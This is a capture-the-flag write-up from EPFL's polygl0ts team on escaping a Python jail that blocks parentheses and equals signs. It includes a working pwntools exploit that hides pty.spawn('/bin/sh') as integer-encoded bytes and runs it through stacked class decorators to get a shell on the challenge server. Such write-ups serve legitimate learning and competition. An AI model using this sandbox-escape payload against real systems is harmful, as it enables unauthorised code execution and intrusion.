polygl0ts
EPFL's CTF team
This challenge was analogue to the other python jails, but with some additional constraints:
Source code of the server:
line = input('>>> ')
blacklist = "()="
for item in blacklist:
if item in line.lower():
raise Exception()
exec(line)
This challenge was not easy, as with no parenthesis you are not able to make any calls to a function.
However, after playing around for a while, we noticed that the eval() python function
parsed \r as newlines, and this let us send multi-line scripts through a single call
to input().
We then bypassed the parentheses usage through python decorators on an empty class, using an integer-encoded payload to avoid the parentheses check by the server.
This was our solution for this one:
from pwn import *
io = connect('chal.b01lers.com', 1336)
io.read()
payload = """import pty
for x in [[112,116,121,46,115,112,97,119,110,40,34,47,98,105,110,47,115,104,34,41]]:
for y in [lambda z: x]:
@print
@eval
@bytes
@y
class z:
pass""".replace("\n", "\r")
io.sendline(payload)
io.interactive()
And this gives the following flag:
pctf{p4r3nz_4r3_t00t4lly_w1ck3d!}